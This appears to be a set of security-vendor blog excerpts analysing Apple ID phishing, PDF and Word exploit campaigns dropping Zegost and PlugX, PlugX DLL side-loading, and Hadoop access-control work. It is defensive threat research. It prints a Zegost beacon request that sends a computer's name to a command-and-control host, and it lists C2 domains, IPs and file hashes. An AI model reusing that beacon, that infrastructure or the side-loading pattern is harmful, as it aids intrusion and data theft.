Phishers appear to have concentrated their fire on a relatively new target: Apple IDs. In recent days, we’ve seen a spike in phishing sites that try to steal Apple IDs.

Upon looking at the URLS, we noted that there was a consistent pattern to the URLs of these phishing sites. They are under a folder named ~flight. Interestingly, trying to access the folder itself will load the following page:

Technically, the sites were only compromised, but not hacked (as the original content was not modified). It’s possible, however, that the sites may be hacked or defaced if the site stays compromised.

As mentioned earlier, the directory contains pages that spoof the Apple ID login page fairly closely:

We’ve identified a total of 110 compromised sites, all of hosted at the IP address 70.86.13.17, which is registered to an ISP in the Houston area. Almost all of these sites have not been cleaned.

The graph above shows the increase in phishing sites targeting Apple IDs. We’ve seen attacks targeting not only American users, but also British and French users. Some versions of this attack ask not only for the user’s Apple ID login credentials, but also their billing address and other personal and credit card information. It will eventually result in a page that states that access has been restored, but of course the information has been stolen. One can see in the sample page below how it asks for credit card information:
Read the rest of this entry »

Additional text and analysis by Kyle Wilhoit

Throughout 2012, we saw a wide variety of APT campaigns leverage an exploit in Microsoft Word (CVE-2012-0158). This represented a shift, as previously CVE-2010-3333 was the most commonly used Word vulnerability. While we continue to see CVE-2012-0158 in heavy use, we have noticed increasing use of an exploit for Adobe Reader (CVE-2013-0640) that was made infamous by the “MiniDuke” campaign. The malware dropped by these malicious PDFs is not associated with MiniDuke, but it is associated with ongoing APT campaigns.

Zegost

One set of malicious PDFs we found that used this exploit contained decoy documents in Vietnamese; the file names were also in the same language.

Figure 1. Sample decoy document

The PDFs contain embedded JavaScript code that it similar to the code used by the MiniDuke campaign. These similarities include similar function and variable names.

Figure 2. Similar JavaScript code

Analyzing the PDF using Didier Stevens’ PDFiD tool shows that the two PDFs are very similar. They may not be identical, but the similarities between the two are hard to deny. The fields of interest here are “/Javascript”, “/OpenAction”, and “/Page”. These fields mean JavaScript is present, automatic actions of some sort take place, and the page number. These three items helped us identify the similarities between MiniDuke and Zegost.

The dropped files and data are also similar. Both campaigns drop the same number of files, with very similar file names, with similar purposes. Even the registry modifications are not too dissimilar.

However, that is where the similarities end. The payload dropped by these PDFs is known as Zegost (or HTTPTunnel) and has been spotted in previous attacks. This has no connection with the MiniDuke malware payload.) The Zegost malware has a distinct beacon:

GET /cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel] HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: dns.yimg.ca
Cache-Control: no-cache

The command and control server, dns.yimg.ca, resolves to 223.26.55.122 which has been used by the more well known command and control servers like imm.conimes.com and iyy.conimes.com. The email addresses used to register this domain, llssddzz@gmail.com, has also been used to register scvhosts.com – another known C&C server – and updata-microsoft.com, which is probably also a threat.

PlugX

The second set of malicious PDFs are not necessarily directly related to one another, although they all drop different PlugX variants. The targets of the attacks we analyzed appear to have been sent to targets in Japan, South Korea, and India.

However, although these attacks also exploit CVE-2013-0640, they are different from the samples discussed above. When comparing the files, one can see the differences, such as the PDF version being used:

Read the rest of this entry »

The whole idea of Big Data brings with it its own special tools and frameworks that are needed to manage the truly enormous mountains of data that are generated, analyzed, and correlated.

One of the frameworks that has found success in Big Data is Hadoop, which is managed by the Apache Foundation. Hadoop is used by a wide variety of organizations to manage and process large quantities of data across computer clusters using simple programming models.

Trend Micro also uses Hadoop in its own environments, and we saw opportunities to help improve the security model of Hadoop. We’ve worked with other Hadoop developers to improve three key areas of Hadoop:

#1: Developing a Coprocessor API for HBase

HBase is a scalable, distributed database built on top of Hadoop and the Hadoop Distributed File System (HDFS). We worked with other developers to introduce a coprocessor API to HBase. Adding this feature to HBase allows developers to include new features and functionality in their HBase platforms.

This allows for Hadoop users to customize their installations to add new features that are not part of the original HBase feature set. While not directly feature-related, this was essential for the second area where we contributed to Hadoop.

#2: Using the Coprocessor For Access Control

With the ability to now add new features, Trend Micro worked to add access control to HBase using the new coprocessor API. This allowed database administrators to set more precise permissions for users.

This may not sound like a significant addition, but it is. This makes multi-tenant usage of a Hadoop/HBase cluster much more secure, as each user is assured that their data is secure and not accessible to other parties.

Read the rest of this entry »

Using encrypted communication like Secure Sockets Layers (SSL) along with the clever use of recent news item as a social engineering lure is the perfect combination to penetrate and remain in a targeted entity’s infrastructure.

It didn’t take long for targeted attacks to use last week’s Boston Marathon bombing as a bait to trick predetermined users into opening malicious attachments. We found an email with a malicious attachment named The Prayer.DOC, urging recipients to pray for the victims of the tragic event.

Figure 1. Sample email leveraging Boston Marathon incident

The said attachment (MD5: 5863fb691dd5b3002c040fc7c535800f and detected as TROJ_MDROP.ATP) exploits the vulnerability in CVE-2012-0158 to drop the malicious executable file “iExplorer.exe” (MD5: 74a8269dd80d41f7c81e0323719c883c ) onto the target’s computer.

This malware, detected as TROJ_NAIKON.A, connects over SSL (port 443) to the domain name gnorthpoint.eicp.net which previously resolved to 220.165.218.39 but now resolves to 50.117.115.89.

The certificate is filled with spoofed information including the identity “donc” and the organization “abc”.

Figure 2. Screenshot of certificate with spoofed info

Read the rest of this entry »

Noted for its stealth routine, PlugX and its developers now appear to be using several legitimate applications, in particular those used by Microsoft, Lenovo, and McAfee, in an effort to remain under the radar.

PLUGX variants are known for its use of normal applications to load its malicious .DLL components. This .DLL hijacking technique is not new and was initially discussed by last July 2010 by Mandiant here. PlugX is able to use any executable and has started to use known applications. The malware also takes advantage of a certain vulnerability found in an executable when .DLLs are loaded, specifically on how executables load the first .DLL file in a specific folder.

Unfortunately, many applications – old and even new ones – still contain this vulnerability.
The first PlugX variant that used this technique is BKDR_PLUGX.SME. It used the legitimate NVIDIA file NvSmart.exe, which imports the functions of the malware’s malicious .DLL. Since then, PLUGX variants have been using other applications to hide their tracks from antimalware software.

Below are some of the malware that use various normal files to load its malicious components:

BKDR_PLUGX.DMI

• uses HHC.EXE which is a legitimate Microsoft file for HTML Help
• loads hha.dll, which then loads hha.dll.bak
• both files are also detected as BKDR_PLUGX.DMI

BKDR_PLUGX.AI

• uses CamMute.exe which is a Lenovo software related to Camera Mute Control Service for ThinkPad
• loads CommFunc.dll, which then loads CommFunc.jax
• both two files are also detected as BKDR_PLUGX.AI

BKDR_PLUGX.AQT

• uses Mc.exe which is a legitimate McAfee file
• loads McUtil.dll, which then loads McUtil.dll.url
• both files are also detected as BKDR_PLUGX.AQT
• connects to the fake anti-malware site vip.{BLOCKED}ate.com

Note that in each case, a specific DLL was paired with an executable. New to these variants is the loading of the encrypted file with the same file name with an additional extension. Here is a code snippet that shows how the encrypted .DLL is loaded:

Figure 1. Screenshot of PlugX code snippet

Read the rest of this entry »